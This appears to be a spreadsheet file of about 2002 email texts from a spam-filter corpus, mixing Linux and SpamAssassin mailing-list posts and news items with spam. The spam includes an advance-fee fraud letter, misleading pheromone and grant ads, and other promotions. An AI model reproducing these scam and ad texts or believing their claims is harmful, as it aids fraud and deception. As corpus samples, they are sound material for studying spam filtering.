 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Get the Child Support You Deserve                      10.124
</t>
  </si>
  <si>
    <t xml:space="preserve">1) Join the Web's Hottest &amp; Fastest Growing Community
 http://www.adclick.ws/p.cfm?o=259&amp;s=pk007
 2) Guaranteed to lose 10-12 lbs in 30 days
 Slim Patch - Weight Loss Patches
 http://www.adclick.ws/p.cfm?o=249&amp;s=pk007
 3) Get the Child Support You Deserve - Free Legal Advice
 http://www.adclick.ws/p.cfm?o=245&amp;s=pk002
 4) Fight The Risk of Cancer - Save Your Lungs
 http://www.adclick.ws/p.cfm?o=315&amp;s=pk007
 5) Start Your Online Private Photo Album 
 http://www.adclick.ws/p.cfm?o=285&amp;s=pk007
 Have a Wonderful Day,
 Offer Manager
 PrizeMama
 If you wish to leave this list please use the link below.
 http://www.qves.com/trim/?zzzz@example.com%7C17%7C308417
</t>
  </si>
  <si>
    <t xml:space="preserve">I remember apt-get dist-upgrading from 7.2 to 7.3 fine, so it -should- 
 work, maybe :)
 --On Tuesday, October 01, 2002 10:27:47 +0200 Thomas Vander Stichele 
 &lt;thomas@urgent.rug.ac.be&gt; wrote:
 &gt; It might be, don't think anyone tried it yet.
                                     -- \m/ --
   "...if I seem super human I have been misunderstood." (c) Dream Theater
          mark@talios.com - ICQ: 1934853 JID: talios@myjabber.net
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] 2800 sightings this month
</t>
  </si>
  <si>
    <t xml:space="preserve">At 1:16 PM -0400 8/22/02, Theo Van Dinter wrote:
 &gt;On Thu, Aug 22, 2002 at 07:05:33PM +0200, Malte S. Stretz wrote:
 &gt;&gt;  Ummm... has somebody noticed that spamassassin-sightings is the fourth most
 &gt;&gt;  active list for this month on [1]? There is more sighting than talk and
 &gt;&gt;  devel together ;-)
 &gt;
 &gt;hmmm.  do people know that they should only send false negatives there?
 &gt;either there's a lot of stuff SA is missing, or some people are just
 &gt;sending all their spam there.
 I've sent in some spam that either didn't score or scored practically 
 nothing, like below 5.  I figure that most people run at 5 so if it 
 scores less than that, a rule needs to be honed to catch it.
 Justin
 -- 
 --
 Justin Shore, ES-SS ES-SSR                Pittsburg State University
 Network &amp; Systems Manager                 http://www.pittstate.edu/ois/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</si>
  <si>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Don't laugh. This is the real Office
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8357900,215/
 Date: 2002-09-29T00:39:54+01:00
 *Euan Ferguson* spends two days at the headquarters of a stationery supplier in 
 Slough and finds the team is much nicer than Ricky Gervais's gallery of 
 grotesques.*Sketches of pain*[1]
 [1] http://www.newsisfree.com/Observer/review/story/0,6903,800788,00.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Wed. OSXCon Keynote -- Jordan Hubbard
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000212.html
 Date: 2002-10-02T09:34:00-08:00
 Talking about his mainframe background and roots in computing. He played a lot 
 on the big iron and sorta "missed" the PC revolution. He wasn't terribly 
 interested in PCs for quite a while. Then he got to play with one...
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Highest Concentration of Pure Human Pheromone            OVDKSPCR
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;BR&gt;&lt;FONT  COLOR=3D"#ff00ff" BACK=3D"#ffffff" style=3D"BACKGROUND-COL=
 OR: #ffffff" SIZE=3D3 PTSIZE=3D12&gt;&lt;center&gt;x=3D=3Dx*x=3D=3Dxx=3D=3Dx*x=3D=3D=
 xx=3D=3Dx*x=3D=3Dxx=3D=3Dx*x=3D=3Dxx=3D=3Dx*x=3D=3Dxx=3D=3Dx*x=3D=3Dx&lt;/cen=
 ter&gt;&lt;br&gt;&lt;br&gt;&lt;i&gt;&lt;b&gt;Absolutely Awesome!!&lt;/b&gt;&lt;/i&gt;&lt;br&gt;&lt;br&gt;&lt;!--#rotate&gt; &lt;b&gt; Ins=
 tantly &lt;/FONT&gt;&lt;FONT  COLOR=3D"#ff0000" BACK=3D"#ff80ff" style=3D"BACKGROUN=
 D-COLOR: #ff80ff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial"=
  LANG=3D"0"&gt; &amp;nbsp;S e x u a l l y  Attract&lt;/FONT&gt;&lt;/FONT&gt;&lt;FONT  COLOR=3D"#=
 ff00ff" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3 PTSI=
 ZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt; with nature's secr=
 et weapon..." P  h  e  r  o  m  o n  e  s"&lt;BR&gt;
 &lt;BR&gt;&lt;BR&gt;
 "I n v i s i b l e   a n d   u n d e t e c t a b l e" , when unknowingly i=
 nhaled, Pheromone Concentrate  unblocks all restraints and releases the ra=
 w  animal s e x drive!&lt;BR&gt;
 &lt;BR&gt; &lt;BR&gt; 
 This is the strongest concentration of &lt;/FONT&gt;&lt;FONT  COLOR=3D"#ff0000" BAC=
 K=3D"#ff80ff" style=3D"BACKGROUND-COLOR: #ff80ff" SIZE=3D3 PTSIZE=3D12 FAM=
 ILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;HUMAN Pheromones&lt;/FONT&gt;&lt;/FONT&gt;=
 &lt;FONT  COLOR=3D"#ff00ff" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffff=
 ff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;, =
 allowed by law, in an essential oil base.&lt;BR&gt;
 &lt;BR&gt;&lt;BR&gt; 
 Available in formulas for both men and women.&lt;BR&gt;
 &lt;BR&gt;&lt;BR&gt; 
 &lt;BR&gt;
 To lea+rn more: &lt;/FONT&gt;&lt;FONT  COLOR=3D"#000000" BACK=3D"#ffffff" style=3D"=
 BACKGROUND-COLOR: #ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D=
 "Arial" LANG=3D"0"&gt;&lt;/B&gt;  &lt;A HREF=3D"http://freesite003.friendly-hosting.co=
 m/"&gt;CLICK HERE TO ATTRACT&lt;/A&gt; &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT  COLOR=3D"#000000" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR=
 : #ffffff" SIZE=3D2 PTSIZE=3D10 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D=
 "0"&gt;&lt;BR&gt;
 To be o m i t t e d from our mailing list please email us at joshua63@emai=
 l.is  with "o m i  t" in the sub-line.&lt;/FONT&gt;&lt;FONT  COLOR=3D"#000000" BACK=
 =3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3 PTSIZE=3D12 FAMI=
 LY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;&lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;*|
 &lt;BR&gt;TO48 6-04 C20 P
 &lt;BR&gt;{%RAND}
 &lt;BR&gt;&gt;&gt;SSPLTM&lt;&lt;2077
 &lt;BR&gt;
 &lt;BR&gt;&lt;BR&gt;&lt;BR&gt;
 &lt;marquee behavior=3Dalternate&gt;&lt;font color=3Dgreen&gt;-Human Pheromones Concen=
 trate-&lt;/font&gt;&lt;/marquee&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;B=
 R&gt;&lt;BR&gt;&lt;BR&gt;
 (S e x u a l l y  attract women S e x u a l l y  attract men Attract Men A=
 ttract Women and Men Instantly Attract Women and Men Become very desirable=
 --Fast
 Gain the sexual advantage Powerful, very powerful Become very desirable)
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] hard- vs. soft-links [was: How to copy some files ]
</t>
  </si>
  <si>
    <t xml:space="preserve">  | Date: Fri, 19 Jul 2002 22:00:02 +0100
   | From: "Matthew French" &lt;mfrench42@yahoo.co.uk&gt;
   |[ ... ]
   | Now here is a thought: a Unix version of the "Deleted Items" folder.
   | 
   | In the root of a hard drive, create a directory ".unwanted".
   | Then periodically create hard links to every file on the hard
   | drive that does not have hard links.
   | 
   | That way, when someone accidentally does "rm *" or whatever,
   | you still have a link under ".unwanted"  [ ... ]
  hum.  interesting variation on the classic technique of
  redefining `rm' to `mv' the files into `./.trash/' (or
  with a prefix of `#' or a suffix of `~'; the variations
  are endless).  these classic techniques only provide a
  means to roll back accidental `rm's, so there is still
  considerable scope for data lost as there are other ways
  of deleting files --- which is not a problem for this
  hard link idea.
  but, like the classic techniques, there is no rolling
  back of accidental overwrites.
  ( rolling back overwrites reminds me of the "snapshot"
   facility on NetWork Appliance fileservers.  and of the
   various "versioning" filesystems which appeared --- and
   then vanished? --- over the years.... )
  one severe(?) gotcha is some files shouldn't have any
  hard links.  both RCS *,v (and hence CVS) and SCCS s.*
  files are like this --- the RCS(/CVS?)/SCCS toolsets
  complain if there are hard links.
 cheers,
 	-blf-
 --
  Innovative, very experienced, Unix and      | Brian Foster    Dublin, Ireland
  Chorus (embedded RTOS) kernel internals     | e-mail: blf@utvinternet.ie
  expert looking for a new position ...       | mobile: (+353 or 0)86 854 9268
   For a résumé, contact me, or see my website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</si>
  <si>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Subject: Online contents of Electronic Publishing journal
</t>
  </si>
  <si>
    <t xml:space="preserve">I recently stumbled across the contents of the journal, "Electronic
 Publishing", which was published from January, 1988 through December, 1995.
 All papers are available online in PDF (this was apparently one of the first
 journals to disseminate in PDF, in 1994). The journal also reprints some of
 the better papers from the Electronic Publishing conferences, held bi-yearly
 from 1986-1992 (EP86, EP88, EP90, EP92).
 http://cajun.cs.nott.ac.uk/compsci/epo/papers/epoddtoc.html
 Today's reader might look at the contents and wonder about their relevance,
 since they don't directly discuss the Web. As an academic, I find this
 journal valuable, since the papers are of generally high quality (by top
 researchers), and they provide lots of pointers to the evolution of the
 ideas that led to many Web technologies.  It's one source among many for
 sifting through the intellectual lineage of electronic publishing
 technologies.
 Rohit and Adam might find the following papers especially relevant, in the
 context of their WWW7 "Evolution of Document Species" paper:
 Page Description Languages: Development, Implementation and Standardization:
 A. L. Oakley and A. C. Norris
 http://cajun.cs.nott.ac.uk/compsci/epo/papers/volume1/issue2/epalo012.pdf
 Important papers in the history of document preparation systems: basic
 sources:
 Richard K. Furuta
 http://cajun.cs.nott.ac.uk/compsci/epo/papers/volume5/issue1/ep057rf.pdf
 (Excellent overview of sources)
 Several of the authors of papers in this journal are now involved in the ACM
 Document Engineering conference series:
 http://www.documentengineering.org/
 - Jim
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Dotcom Scoop: "CNET's Download.com is set to introduce a new
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/24#When:5:47:50PM
 Date: Wed, 25 Sep 2002 00:47:50 GMT
 Dotcom Scoop[1]: "CNET's Download.com is set to introduce a new program for its 
 Download.com software portal. Beginning Sept. 30, software vendors will be 
 charged a fee to upload their wares. There is also a monthly-package to get 
 better placement on the site."
 [1] http://www.dotcomscoop.com/article.php?sid=366
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: A nation searches its soul
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8560348,215/
 Date: 2002-10-04T17:55:51+01:00
 *Brussels dispatch:* Calls for an inquiry into Belgium's complicated wartime 
 past are gathering pace, writes *Andrew Osborn*.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: AA Meetings the Hottest Place to Meet Women With Big Bucks
</t>
  </si>
  <si>
    <t xml:space="preserve">less obscure haiku 
 buy a puppy, ro!
 they are chick magnets. master
 ventriloquism.
 gg
 -----Original Message-----
 From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of Tom
 Sent: Wednesday, September 18, 2002 7:13 PM
 To: R. A. Hettinga
 Cc: fork@spamassassin.taint.org
 Subject: Re: AA Meetings the Hottest Place to Meet Women With Big Bucks
 On Wed, 18 Sep 2002, R. A. Hettinga wrote:
 --]AA Meetings the Hottest Place to Meet Women With Big Bucks
 And, as always, you can take a page out of Fight Club and start showing up
 at all sorts of support groups. Look what it did for Marla and Jack...
 "JACK You can't have *both* parasites. You take blood parasites and --
 MARLA I want brain parasites.
 She opens another dryer and does the same thing again. PG 19
 JACK Okay. I'll take blood parasites and I'll take organic brain dementia
 and --
 MARLA I want that.
 JACK You can't have the whole brain!
 MARLA So far, you have four and I have two!
 JACK Well, then, take blood  parasites. Now, we each have three.
 MARLA So, we each have three -- that's six. What  about the seventh day? I
 want ascending bowel cancer.
 JACK *I* want ascending bowel cancer.
 MARLA That's your favorite, too? Tried to slip it by me, huh?
 JACK We'll split it. You get it the first and third Sunday of the month.
 MARLA Deal."
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAtalk] Re: Spamassassin-talk digest, Vol 1 #659 - 41 msgs
</t>
  </si>
  <si>
    <t xml:space="preserve">
 On 9/11/2002 at 10:01 AM  spamassassin-talk-request@lists.sourceforge.net
 spamassassin-talk@lists.sourceforge.net wrote:
 &gt;Message: 15
 &gt;From: Vivek Khera &lt;khera@kcilink.com&gt;
 &gt;Date: Wed, 11 Sep 2002 10:06:55 -0400
 &gt;To: spamassassin-talk@example.sourceforge.net
 &gt;Subject: Re: [SAtalk] Calypso email = ratware? 
 &gt;
 &gt;&gt;&gt;&gt;&gt;&gt; "JM" == Justin Mason &lt;jm@jmason.org&gt; writes:
 &gt;
 &gt;JM&gt; Now all we need to do is get all the SpamAssassin users out there to
 &gt;JM&gt; upgrade...
 &gt;
 &gt;Considering that the rules need to adapt to the changing look and feel
 &gt;of spam vs. non-spam, does it make sense to have SA automatically
 &gt;issue a notice when it is, say 9 months old, recommending that the
 &gt;user/operator check for updated rules?
 &gt;
 &gt;Sort of like a nag-ware feature, but in self-defense for the user, not
 &gt;the vendor ;-)
 &gt;
 &gt;-- 
 &gt;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 &gt;Vivek Khera, Ph.D.                Khera Communications, Inc.
 &gt;Internet: khera@kciLink.com       Rockville, MD       +1-240-453-8497
 &gt;AIM: vivekkhera Y!: vivek_khera   http://www.khera.org/~vivek/
 better yet would be a built-in server check on a periodic basis, even
 daily, looking for the existence of an update, and if found prompt the
 system admin to upgrade the server.  With the ever changing face of spam,
 this would probably be a big benefit to SA users and help keep everyone up
 to date.  We have not done this with too many of the apps we sell on
 www.RoseCitySoftware.com strictly because of joe-average-user concerns
 about spyware and "phoning home", but in cases where the app needs to
 access the internet anyhow, we have done it with great success and minimal
 concern by our users.
 ----
 Joseph Burke
 President/CEO
 InfiniSource, Inc.
 &lt;jburke@infinisource.com&gt; 
 -------------------------------------------------------
 In remembrance
 www.osdn.com/911/
 _______________________________________________
 Spamassassin-talk mailing list
 Spamassassin-talk@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: YOU MAY WANT TO LOOK INTO GRANTS.
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;body&gt;
 &lt;hr width = "100%"&gt;
 &lt;center&gt;&lt;font size = "+2" color = "#44C300"&gt;&lt;b&gt;Government Grants E-Book 2002 edition&lt;/font&gt;&lt;/b&gt;&lt;p&gt;
 &lt;table&gt;&lt;Tr&gt;&lt;td&gt; 
 &lt;li&gt;You Can Receive The &lt;font color = "green"&gt;&lt;b&gt;Money&lt;/b&gt;&lt;/font&gt; You Need...
 &lt;li&gt;Every day &lt;b&gt;&lt;font color = "green"&gt;millions of dollars&lt;/font&gt;&lt;/b&gt; are given away to people, just like you!!
 &lt;li&gt;Your Government spends &lt;b&gt;&lt;font color = "green"&gt;billions&lt;/font&gt;&lt;/b&gt; of tax dollars on government grants.
 &lt;li&gt;Do you know that private foundations, trust and corporations are
 &lt;li&gt;required to give away a portion of theirs assets. It doesn't matter,
 &lt;li&gt;where you live (USA ONLY), your employment status, or if you are broke, retired
 &lt;li&gt;or living on a fixed income. There may be a grant for you!
 &lt;hr width = "100%"&gt;
 &lt;li&gt;&lt;font color = "red"&gt;&lt;b&gt;ANYONE&lt;/b&gt;&lt;/font&gt; can apply for a Grant from 18 years old and up!
 &lt;li&gt;We will show you HOW &amp; WHERE to get Grants. &lt;font color = "red"&gt;&lt;b&gt;THIS BOOK IS NEWLY UPDATED WITH THE MOST CURRENT INFORMATION!!!&lt;/b&gt;&lt;/font&gt;
 &lt;li&gt;Grants from $500.00 to $50,000.00 are possible!
 &lt;li&gt;GRANTS don't have to be paid back, EVER!
 &lt;li&gt;Grants can be ideal for people who are or were bankrupt or just have bad credit.
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;br&gt;&lt;font size = "+1"&gt;Please Visit Our Website&lt;p&gt;&lt;/font&gt;
 And Place Your &lt;font color = "red"&gt; &lt;b&gt;Order TODAY!&lt;/b&gt; &lt;/font&gt;&lt;a href = "http://www153.wiildaccess.com/"&gt;&lt;b&gt;&lt;font size="5"&gt;CLICK HERE&lt;/font&gt;&lt;/b&gt; &lt;/a&gt;&lt;p&gt;&amp;nbsp;&lt;p&gt;
 &lt;font size="1"&gt;
 We apologize for any email you may have inadvertently received.&lt;br&gt;
 Please &lt;a href = "http://www153.wiildaccess.com/remove.htm"&gt;CLICK HERE&lt;/a&gt; to be removed from future mailings.&lt;/font&gt;&lt;br&gt;
  [IYs5]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 9/11, war in Iraq threaten Disney parks
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85531557
 Date: Not supplied
 Disney's themepark business is in deep trouble in the post-9/11 world. A war 
 with Iraq could really kill 'em: 
     While aggressively adding attractions, Disney boosted its profit by 
     steadily raising admission prices. The strategy worked, helping deliver 
     record profit for Disney year after year. 
     "The strategy was build, build, build. Every year there was something new," 
     said David Koenig, a Disney historian and author. "It was an astounding 
     growth period.... Now they're overexposed."... 
     Theme park operating income for Disney this year is expected to fall 27% to 
     $1.16 billion, said Prudential Securities analyst Katherine Styponias. By 
     2003, she said, the business could climb to $1.49 billion, depending on 
     whether the U.S. goes to war with Iraq.  
 Link[1] Discuss[2]
 [1] http://www.latimes.com/business/la-fi-disney6oct06,0,1287712.story?coll=la%2Dheadlines%2Dbusiness%2Dmanual
 [2] http://www.quicktopic.com/boing/H/iewxPJy39cF7
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] WILSON  KAMELA
</t>
  </si>
  <si>
    <t xml:space="preserve">ATTN:SIR/MADAN      
                       STRICTLY CONFIDENTIAL.
 I am pleased to introduce myself  to you.My name is Mr. Wilson Kamela a native of South Africa and a senior employee of mines and natural resources department currently on a trainning course in Holland for few months.
 I  am writing this letter to request your assistance in order to redeem an investment with the South African mining Corporation.The said investment, now valued at  ($15.5 million dollars ) Fifteen  million,five hundred thousand dollars only was purchased by Lucio Harper and contracted out to the South  African Mining Corporation in 1977 now recognised as mines and natural resources department.This redeemable investment interest,has now matured since March last year.
 Since MARCH last year, several attempts have been made to contact Lucio Harper without success and there is no way to contact any of his close relatives in whose favour the investment cash value can be paid.                                                    
 Since we have access to all Lucio Harper's information,we can claim this money with the help of my partners with the South African Mines and natural resources department.All we have to do is to file claim using you as Lucio Harper's relative.
 I will like to assure you that there is absolutely nothing to worry about,because it is perfectly safe with no risk involved.Please ensure to keep this matter strictly confidential.My partner will file a claim for this money on your behalf from the SouthAfrican mining Corporation.When the claim is approved,you as the beneficiary 
 will be paid (25%) of the total amouth.
 Since this money can be paid directly into any bank account of your choice,you have responsibility to ensure that my partner and Ireceive(70%)of the total amouth.While the balance (5%) will be set aside for any unforseen expenses in the cause of transfering this money.
 I will appreciate if you can give your assurance and guarantee that our share will be well secured.Please for the sake of confidentiality,reach me on my e-mail address:  wilsonkamela3000@mail.com .  Please let me know if this proposal is acceptable to you. Kindly reach me immediately with any of the stated contact addresses so that better clearifications 
 relating to the transaction will be explained to you.
 Truly yours,
 Wilson Kamela.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Quoting Ciaran Johnston (cj@nologic.org):
 &gt; Thanks for all the replies.
 &gt; 
 &gt; I see from
 &gt; http://www.sosonline.co.uk/Shop/Product_Details.asp?DP=1215&amp;RP=0 that
 &gt; I can get a Seagate internal DDS-4 capable drive for Euro1,018.43.
 &gt; This is about the limit of my spending. However, this OnStream IDE
 &gt; tape drive - http://web6.scan.co.uk/Products/Info.asp?WPID=14022
 &gt; (thanks for the link, Martin) - by my calculations provides more
 &gt; storage at only slightly slower speeds at half the price. Is there any
 &gt; overriding reason why I should go with the more expensive and
 &gt; lower-capacity DDS-4 drive other than speed?
 The ADR (Advanced Digital Recording) tape format is an interesting
 option, one I hadn't seen much of, before.  Look as if OnStream (spun
 off from Philips Electronics in 1998) invented and rather tightly
 control the format, though other companies such as Verbatim do make
 compatible media under licence.
 If you're reasonably serious about backup, you need to plan for a
 rotational backup scheme and retirement of tapes as they become worn
 (and well before they start failing).  That requires at least a couple
 of dozen tapes for the first couple of years.  Therefore, cost and
 availability of media are (or should be) a major factor.  Also, tape
 heads wear out and need to be replaced (more rapidly for helical-scan
 systems -- which ADR turns out _not_ to be), and somehow that always
 ends up being cheaper for tape technologies in which there is heavy
 competition.
 The less-tangible consideration that comes most immediately to mind is
 that, if one's OnStream ADR drive fails, the only possible replacement
 that would suffice to restore your accumulated backup sets is another 
 OnStream ADR drive.  In that sense, you're somewhat locked in:  I'm 
 not seeing ADR drives from anyone else (though I might have missed
 them).  
 If OnStream are smart, they've priced the drives to attract people into
 the system, and are making up the shortfall on media cost after they 
 get people to buy in.   I see the following prices for mail order 
 (http://www.finnsoft.com/priclist/verbat.htm) of Verbatim-brand tapes:
 42 euros for 30 GB ADR tape
 33 euros for 30 GB ADR tape, four-pack.
 66 euros for 50 GB ADR tape.
 44 euros for 50 GB ADR tape, four-pack.
 47 euros for ADR cleaning tape.
 (You don't get much lower pricing than Verbatim, without going no-name.)
 Capacities are usually quoted on the basis of a nominal 2:1 compression
 ratio.  The PDF datasheet for Onstream's "ADR2" series says this is a
 linear-serpentine recording technology (a good thing) like DLT, SDLT,
 and LTO, rather than a helical-scan method typified by DDS/DAT, AIT, and
 8mm (which puts heavy wear on tapes on heads).
 I'm not sure what software other than NovaStor's TapeCopy and Yosemite
 Technology's Tapeware will support OnStream's drives.  My recollection
 is that BRU will do it.
 On balance, I'd personally _still_ go with a DDS4 drive using either DDS3
 or DDS4 media, mostly because once you've survived life with one
 oddball, less-standard tape format, you're not in a hurry to repeat the
 experience.  But ADR does seem at a quick glance to be well designed,
 and might be a good bet after all.  As they say in the gaming industry,
 "Ya pays your money, and ya takes your chances."
 -- 
 "Is it not the beauty of an asynchronous form of discussion that one can go and 
 make cups of tea, floss the cat, fluff the geraniums, open the kitchen window 
 and scream out it with operatic force, volume, and decorum, and then return to 
 the vexed glowing letters calmer of mind and soul?" -- The Cube, forum3000.org
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Buy Ryanair Travel Insurance Today
</t>
  </si>
  <si>
    <t xml:space="preserve">Ryanair in partnership with Primary Insurance
 offer excellent value travel insurance from
 7.00GBP/9.00 Euro per person for 31 day cover.
 Annual travel insurance* from 45.00GBP/63.00 Euro,
 includes 24 days winter sports cover !
 Our travel insurance provides a high standard of cover.
 Summary of Cover
 Medical Expenses up to 2 million
 Personal Liability  up to 2 million
 Personal Effects &amp; Baggage up to 750
 Personal Accident Maximum Benefit 15,000
 Hospital Benefit up to 300
 Cancellation up to 500
 Curtailment up to 500
 Travel Delay up to 60
 Missed Departure up to 300
 Personal Money up to 500
 Legal Expenses up to 5000
 Holiday Abandonment up to 500
 All figures in Sterling pounds
 To book your Primary travel insurance policy
 click http://www.primarytrade.co.uk/internetsales/ryanair/
 or call Ryanair Direct Reservations now on:
 0871 246 0002 (UK)	0818 304 304 (IRELAND)
 Primary Insurance also offer excellent rates on
 Golf Insurance from 15.00GBP/19.00 Euro
 per passenger for 31 day cover
 Ski insurance from 35.00GBP/45.00 Euro
 per passenger for 31 day cover
 Cover is only available to habitual residents of the UK and Ireland.
 *only available through the web.
 ====================================================================
 E-MAIL DISCLAIMER
 This e-mail and any files and attachments transmitted with it
 are confidential and may be legally privileged. They are intended
 solely for the use of the intended recipient.  Any views and
 opinions expressed are those of the individual author/sender
 and are not necessarily shared or endorsed by Ryanair Holdings plc
 or any associated or related company. In particular e-mail
 transmissions are not binding for the purposes of forming
 a contract to sell airline seats, directly or via promotions,
 and do not form a contractual obligation of any type.
 Such contracts can only be formed in writing by post or fax,
 duly signed by a senior company executive, subject to approval
 by the Board of Directors.
 The content of this e-mail or any file or attachment transmitted
 with it may have been changed or altered without the consent
 of the author.  If you are not the intended recipient of this e-mail,
 you are hereby notified that any review, dissemination, disclosure,
 alteration, printing, circulation or transmission of, or any
 action taken or omitted in reliance on this e-mail or any file
 or attachment transmitted with it is prohibited and may be unlawful.
 If you have received this e-mail in error
 please notify Ryanair Holdings plc by emailing postmaster@ryanair.ie
 or contact Ryanair Holdings plc, Dublin Airport, Co Dublin, Ireland.
 =====================================================================
 E-MAIL DISCLAIMER
 This e-mail and any files and attachments transmitted with it 
 are confidential and may be legally privileged. They are intended 
 solely for the use of the intended recipient.  Any views and 
 opinions expressed are those of the individual author/sender 
 and are not necessarily shared or endorsed by Ryanair Holdings plc 
 or any associated or related company. In particular e-mail 
 transmissions are not binding for the purposes of forming 
 a contract to sell airline seats, directly or via promotions, 
 and do not form a contractual obligation of any type.   
 Such contracts can only be formed in writing by post or fax, 
 duly signed by a senior company executive, subject to approval 
 by the Board of Directors.
 The content of this e-mail or any file or attachment transmitted 
 with it may have been changed or altered without the consent 
 of the author.  If you are not the intended recipient of this e-mail, 
 you are hereby notified that any review, dissemination, disclosure, 
 alteration, printing, circulation or transmission of, or any 
 action taken or omitted in reliance on this e-mail or any file 
 or attachment transmitted with it is prohibited and may be unlawful.
 If you have received this e-mail in error 
 please notify Ryanair Holdings plc by emailing postmaster@ryanair.ie
 or contact Ryanair Holdings plc, Dublin Airport, Co Dublin, Ireland.  
 ---
 You are currently subscribed to customers as: zzz-ryanair@spamassassin.taint.org
 To unsubscribe send a blank email to leave-customers-949326K@mail.ryanairmail.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Bill Stoddard wrote:
 &gt;&gt;GAB&gt; The problem is that politics have gotten so muddied
 &gt;&gt;GAB&gt; nowadays, that shouting down and unpeaceably disrupting
 &gt;&gt;GAB&gt; political rallies that you don't agree with has become
 &gt;&gt;GAB&gt; common practice.  The courts have constantly ruled
 &gt;&gt;GAB&gt; that there are some restrictions on the first amendment.
 &gt;&gt;GAB&gt; They teach you that your very first year of law school.
 &gt;&gt;
 &gt;&gt;I'll agree with Owen on this one.  Muddied my ass.  How hard is it to
 &gt;&gt;chose between a Republocrat or a Demipublican?   Not very.  Shouting
 &gt;&gt;down has grown to become the answer because the government, over a
 &gt;&gt;span of years, and with the help of the Courts -has- limited the
 &gt;&gt;rights we have as citizens under the First Amendment.
 &gt;&gt;    
 &gt;&gt;
 &gt;
 &gt;Wishful thinking. People are just bigger dickheads now. Culture is changing
 &gt;and it is becoming acceptable to get in peoples face and shout them down
 &gt;when you disagree with them.  The people that do this are NOT
 &gt;disenfranchised. They
 &gt;get their rocks off on being disagreeable assholes. The act of protesting is
 &gt;more important than the actual issue being protested for most of these
 &gt;people.
 &gt;  
 &gt;
 In my experience, this is classic "American" behaviour, and I don't 
 think its on the increase outside of the US of A.
 I am willing to accept the premise that Americans are bigger dickheads 
 then they used to be.
 Owen
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [zzzzteana] Moon over ocean
</t>
  </si>
  <si>
    <t xml:space="preserve">David asked:
 &gt; My wife noticed something odd.  The nearly-full moon was about 30
 &gt; degrees above the horizon.  There was a notable glow on the horizon,
 &gt; except under the moon.  The moon seemed to be in a column of darkness
 &gt; that was about three times the apparent width of the moon.  We could see
 &gt; the column over its entire length as a strip of sky darker than the sky
 &gt; around it.
 &gt;
 &gt; Any of you ever see this?  Do you have any idea what could have caused
 &gt; it?  I suspect it's due to some pecularity of the visual system, but
 &gt; have no clear idea.
 I'm surprised to not find this phenomenon in Corlis. I could have sworn I
 saw it there. He does have the somewhat similar dark sky between a rainbow
 and a secondary bow. I personally have seen a rainbow enclosing a
 semi-circle of darker sky.
